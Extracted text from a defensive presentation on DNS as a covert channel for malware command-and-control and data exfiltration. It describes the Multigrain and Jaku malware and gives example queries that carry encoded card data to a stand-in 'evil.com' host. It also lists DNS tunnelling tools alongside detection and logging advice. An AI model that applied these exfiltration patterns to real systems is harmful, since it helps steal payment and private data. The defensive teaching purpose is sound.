DNS – A HOLE IN YOUR FIREWALLanthony.keane@itb.ie | stephen.sheridan@itb.ie

THE PROBLEMTHE PROBLEM

SECURITY

CYBER SECURITY LANDSCAPE

Te

ch

no

log

y R

eli

an

ce

/Co

mp

lexit

y

Perimeter

Security

Layered

Security

Inclusion &

Exclusion

Security

1980s 1990s (www) 2000s (social media) 2016+ (IOT)

Assumed state of

Compromise

ATTACK CHAIN - ADVANCED PERSISTENT THREAT (APT)

Intel

gathering

Point of

entryCompromise

Command &

Control C2

Lateral

Movement

Asset/Data

Recovery

Data

Exfiltration

Covert Communication

COVERT CHANNELS & NETWORK STEGANOGRAPHY

Wax tablets 5th century BC Micro Dots WWII Image Steganography – changing least

significant bits

COVERT CHANNELS & NETWORK STEGANOGRAPHY

LL (1) + LN (3) + LL (1) + LN (3) + LL (1) + LN (2) + NL (1) = 12 bytes

Slack space of = 243 bytes Track 2 = 40 bytes

Track 1 = 79 bytes

WHY SHOULD WE BE CONCERNED ?

68%

!GOOD

BAD

HTTP

FTPFocus on other

protocols

means less time

looking

at DNS traffic.

DNS is ubiquitous.

In order to do good

or bad things on the

internet you need

DNS.

91.3 %of malware

uses DNS in attacks

in some shape or

form.

68% of orgs

don’t monitor

recursive DNS.

DNS91.3%

HOW DOES IT WORK?

DNS

Firewall Compromised

Host

Private

DataEvil Server Authoritative

Nameserver

Malware known to use DNS - MULTIGRAIN

Variant of point of sale (POS) malware known as NewPosThings. Highly targeted,

digitally signed and exfiltrates payment data over DNS. Engineered to target

specific POS process multi.exe. If multi.exe does not exist malware will delete

itself.

Hashed volume serial number + last five

bytes of MAC base32 encoded with computer

name and version number.

install.<base32 encoded data>.evil.com

Track 2 payment info scrapped from memory

and stored in buffer. Malware checks buffer

every 5 mins, encrypts data with 1024bit

RSA and base32 encodes within DNS query.

log.<base32 encoded track2 data >.evil.com

DNS~ 5 mins

Malware known to use DNS – JAKU BOTNET

Specific targets NGO’s, Engineering companies, Academic institutions, Scientists

and Government employees. Victims are spread over globe but primarily in S.

Korea and Japan. Sophisticated and resilient with different command and control

approaches.

pWrpqMoqqipJiiwGBgaoxueIyMaG56g.eq

= "+MICROSOFT_000C29DB249C” which is

’+’ followed by computer name and MAC

address.

install.<base32 encoded data>.evil.com

Translates returned CNAME query of

LS4.com to ‘go’ and looks for command

parameters. For example, LS4.test.com

would be ‘go’ with parameter of test.

LS4.test.com

<base 32 encoded data>.evil.com

~ 2 mins DNS

NEEDLE IN A HAYSTACK- WHAT TO LOOK FOR?

x--344--umnxifvfmxvzbzdzxvehf-3jwl7tchv-xgv3khzlqwnz-q5rizf2i.co.uk

ドメイン.テスト

VGhpcyBpcyBhIHNlY3JldCBtZXNzYWdlIGZvciB5b3U=.cvrtns.mooo.com

01110100 01101000 01101001 01101110 01101011 01100111 01100101

01100101 01101011.co.uk

3---sn-xpgjvh-q0ce.googlevideo.com.

ew5mz7jl6k.search.serialssolutions.com.

s-static.ak.facebook.com.

0xdabbad00.com.

p4-heybcnjawql6y-2lhkfkmkqfbb7eev-if-v6exp3-v4.metric.gstatic.com.

bstatic-a.akamaihd.net.

fbcdn-profile-a.akamaihd.net.

EXFILTRATION TESTING

• IODINE - http://code.kryo.se/iodine/

• OzymanDNS - https://dankaminsky.com/2004/07/29/51/

• DNSCat - https://wiki.skullsecurity.org/Dnscat

• CobaltStrike - https://www.cobaltstrike.com/

• Roll your own version in python, it’s not that hard.

• Use your Linux command line tools and some scripting (xxd, base64, dig)

TECHNIQUES FOR DETECTION

STATISTICAL

ANALYSISUse of character frequency

analysis along with ngram

and entropy analysis.

TRAFFIC

ANALYSISKnow your network. Create

a baseline for anomaly

detection.

ARTIFICIAL

INTELLIGENCEMachine learning

techniques can be used to

spot patterns in traffic and

spot anomalies.

LOG DNS TRAFFIC

DNS TRAFFIC LOGGING APPROACHES

TURN ON

LOGGINGPeriodically turn on logging

on DNS servers. May be

costly but worth it to create

a baseline.

SNIFF

PACKETSUse tools like WireShark to

sniff packets of the wire

without affecting existing

network architecture.

PASSIVE

DNSImplement a PASSIVE

DNS server and contribute

a wider intelligence

community.

DNS INTELLIGENCE

IN SUMMARY

• DNS is ubiquitous almost all internet traffic is dependant on it.

• DNS has characteristics that are very useful to malicious actors.

• Malware uses DNS for C2 and data exfiltration.

• Approaches can be taken to mitigate but we have to log DNS traffic.

• Opportunity to contribute to wider cyber security intelligence community by

implementing passive DNS.

• Organisations such as DNS-OARC can facilitate sharing of intel.

• If you are interesting in logging DNS, sharing DNS data or have questions

come and speak to us.

QUESTIONS

DNS ?